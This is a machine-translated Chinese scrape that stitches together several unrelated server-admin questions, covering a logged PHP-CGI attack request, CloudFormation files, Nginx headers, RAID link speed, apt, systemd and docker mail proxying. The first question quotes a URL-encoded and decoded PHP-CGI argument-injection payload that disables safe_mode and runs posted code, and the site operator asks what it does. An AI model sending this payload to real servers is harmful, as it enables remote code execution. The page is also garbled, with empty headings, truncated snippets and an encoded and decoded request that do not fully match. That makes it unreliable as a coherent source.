我们向我们的服务器发送了一个 POST 请求,其中包含以下内容:
%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%F%69%6E%70%75%74+%2D%6E
Run Code Online (Sandbox Code Playgroud)
使用 url 解码这转化为:
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env file=php://input -n
Run Code Online (Sandbox Code Playgroud)
它似乎类似于Ubuntu 14.04 上通过 Nginx 的奇怪 URL 请求,恶意用户试图做什么?. 请求在什么情况下会起作用?我从日志中看到我们发送了 404,但我想确保我们没有任何其他可能容易受到攻击的盒子。
我需要将我的 CF 模板(GraphQL 架构、Lambda 源等)的一些文件存储到 S3 存储桶中,该存储桶也(希望)在同一模板中定义,因为这似乎是直接删除内容之外的唯一方法进入模板来做。我也在尝试提前考虑 CI/CD,如果检查这些文件并且 CI/CD 工具适当地移动它们会很好。
有没有办法将文件从模板复制到 S3?大多数人如何使用 CI/CD 做到这一点?
deployment amazon-web-services continuous-integration amazon-cloudformation aws-cli
我正在使用 Varnish,我不太确定是否还应该删除Server: nginxHTTP 标头。为什么有人需要知道我正在使用 NGINX?可以从响应中删除这个 HTTP 标头还是在某个地方需要它?从安全的角度来看,这样做可能更好?
这是设置:
问题:
我想要发生的事情:
我试过的:
我有一台服务器,我将很快在其中更新 Adaptec RAID 控制器固件和驱动程序,因此我在 arcconf 中检查了一些事情。
四个磁盘都是相同型号配置为RAID10卷。在运行 arcconf 的 GETCONFIG 时,我有点惊讶其中一个驱动器的运行速度为 3.0gb/s 而不是 6,就像其他驱动器一样。
这可能是什么原因,有没有办法让它以 6gb/s 的速度运行?
Controllers found: 1
----------------------------------------------------------------------
Controller information
----------------------------------------------------------------------
Controller Status : Optimal
Channel description : SAS/SATA
Controller Model : Adaptec 6805
Controller Serial Number :
Controller World Wide Name :
Controller Alarm : Enabled
Physical Slot : 1
Temperature : 54 C/ 129 F (Normal)
Installed memory : 512 MB
Global task priority : High
Performance Mode : Default/Dynamic
Host bus type : PCIe …Run Code Online (Sandbox Code Playgroud) 我正在运行 Debian 8 Jessie,尝试从 shell 脚本安装 PHP 命令行解释器。
这是我所做的:
sudo apt-get install php-cli
Run Code Online (Sandbox Code Playgroud)
它告诉我没有php-cli。我确实发现有php5-cli。但是,为了使我的脚本更加健壮,例如在最近的 ubuntu 服务器产品上运行时php7,我不想指定php5-cli.
我用谷歌搜索答案,但我得到的只是让我困惑:
xrfang@P-qapub:~$ sudo apt-get install --names-only "php*-cli"
E: Command line option --names-only is not understood
xrfang@P-qapub:~$ sudo apt-cache search --names-only php-cli
php-google-api-php-client - Google APIs client library for PHP
xrfang@P-qapub:~$ apt-cache search --names-only "php\d+-cli$"
xrfang@P-qapub:~$ apt-cache search --names-only "php\d-cli$"
xrfang@P-qapub:~$ apt-cache search --names-only "php\\d-cli$"
xrfang@P-qapub:~$ apt-cache search --names-only "php5-cli$"
php5-cli - command-line interpreter for …Run Code Online (Sandbox Code Playgroud) 在 Windows Server 2012 中,您是否可以检索上周访问、修改或删除共享文件夹的用户的日志(通过 Powershell)?
为了运行第三方 WSUS 脚本(针对 Windows 内部数据库),我下载了 x64 版本的Microsoft Command Line Utilities 14 for SQL Server,但是当我尝试安装时,我收到以下错误消息:
安装程序缺少安装先决条件:Microsoft ODBC Driver 11 for SQL Server。要继续,请为 SQL Server 安装 Microsoft ODBC 驱动程序 11,然后再次运行安装操作。
按照说明安装 ODBC 驱动程序(从此页面下载)无效,尝试安装命令行实用程序时我仍然收到相同的错误消息。
此外,虽然我在运行安装程序时确实下载了“Microsoft Command Line Utilities 14 for SQL Server”,但它的标题是“Microsoft Command Line Utilities 13 for SQL Server”。
(强调我的。)
这里到底发生了什么,我如何才能成功安装最新版本的命令行实用程序?
如何判断脚本是从 systemd 还是从用户调用的?
我为一个老式的守护进程创建了一个服务。我们刚刚切换到 systemd,我的一些管理员喜欢直接调用 rc-script。在机器重新启动的情况下,这不会很好地工作。Systemd 不会尊重 ,PIDFile=因为新启动的守护进程不是它的服务 cgroup 的一部分。
我添加了服务文件和 rc_script。我不能因用户 ID 而异,因为要使用脚本,用户必须是foobaruser.
停止服务现在有问题,因为 systemd 会从删除的 pid 文件中识别出这一点。
那么如何确定脚本是否是从 systemd 调用的呢?
[Unit]
Description=Foobar Service
After=syslog.target network.target
[Service]
Type=forking
User=foobaruser
LimitNOFILE=60000
LimitNPROC=8000
TasksMax=8000
PIDFile=/local/foobar/foo.pid
ExecStart=/opt/foobar/rc_script start
ExecStop=/opt/foobar/rc_script stop
TimeoutSec=100
TimeoutStopSec=300
KillMode=none
RemainAfterExit=no
Environment=LANG=de_DE.UTF-8
[Install]
WantedBy=multi-user.target
Run Code Online (Sandbox Code Playgroud)
#!/bin/bash
case $1 in
start)
VAR_IS_SYSTEMD=$( ... script to check if bash is run from systemd ... )
if [ "$VAR_IS_SYSTEMD" = false ] ; then
sudo systemctl …Run Code Online (Sandbox Code Playgroud) 我想知道这是否可能,如果可以,我如何在一台专用服务器上同时运行 nginx-proxy 和 poste.io 邮件服务器?
我可以单独运行这两个容器,但是当我尝试同时运行这两个容器时,它说我无法运行后一个容器,因为端口 443 已被另一个容器使用。
现在,当我只使用 nginx 反向代理时,我会在服务器上运行多个网站,所有这些网站都会公开端口 80 和 443 以及代理本身,这让我很困惑为什么我不能运行另一个容器做同样的事情(是的,我知道通常两个进程不应该能够使用同一个端口而不需要一些摆弄)。
我使用以下代理: https: //github.com/jwilder/nginx-proxy
我的邮件服务器使用https://poste.io
这是我在服务器上运行的网站 docker-compose 之一的示例。
application:
build: code
volumes:
- /websites/domain:/var/www/laravel
- /docker/webs/domain/logs:/var/www/laravel/storage/logs
tty: true
redis:
image: redis:alpine
db:
image: mariadb:10.2
environment:
MYSQL_ROOT_PASSWORD: toor
MYSQL_DATABASE: laravel
TEST_DB_NAME: laravel_test
MYSQL_USER: laravel
MYSQL_PASSWORD: laravel
php:
build: php7-fpm
volumes_from:
- application
links:
- db
- redis
nginx:
build: nginx
links:
- php
volumes_from:
- application
- nginx-proxy
volumes:
- ./logs/nginx/:/var/log/nginx
environment:
- VIRTUAL_HOST=www.domain.com
Run Code Online (Sandbox Code Playgroud)
在我的 nginx …
adaptec ×1
apt ×1
aws-cli ×1
bash ×1
centos7 ×1
deployment ×1
docker ×1
email-server ×1
http ×1
http-headers ×1
internal-dns ×1
linux ×1
nginx ×1
powershell ×1
raid ×1
regex ×1
sata ×1
split-dns ×1
split-tunnel ×1
sql-server ×1
systemd ×1
varnish ×1
vpn ×1
windows ×1
windows-10 ×1